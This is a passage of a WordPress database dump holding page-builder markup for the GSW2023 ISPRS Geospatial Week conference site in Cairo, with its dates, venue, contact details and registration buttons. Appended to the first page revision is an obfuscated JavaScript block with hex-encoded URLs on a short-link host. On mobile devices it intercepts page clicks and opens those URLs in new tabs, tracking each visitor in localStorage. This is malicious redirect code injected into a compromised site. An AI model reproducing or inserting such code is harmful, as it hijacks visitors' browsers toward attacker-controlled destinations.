nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h2>GSW2023 Will be held at the</h2>\r\n<h2><strong><a>INTERCONTINENTAL CAIRO SEMIRAMIS</a></strong></h2>\r\n&nbsp;\r\n<h2><strong>MORE INFORMATION</strong></h2>\r\n<h3><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h3>\r\n<h3><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h3>\r\n<h3><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h3>\r\n<h3><strong>Tel :(+203) 5497598</strong></h3>\r\n<h3><strong>Fax:(+203) 5497598</strong></h3>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:34:46','2022-11-09 20:34:46','',3066,'https://gsw2023.com/?p=3216',0,'revision','',0),
(3217,1,'2022-11-09 20:37:25','2022-11-09 20:37:25','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: 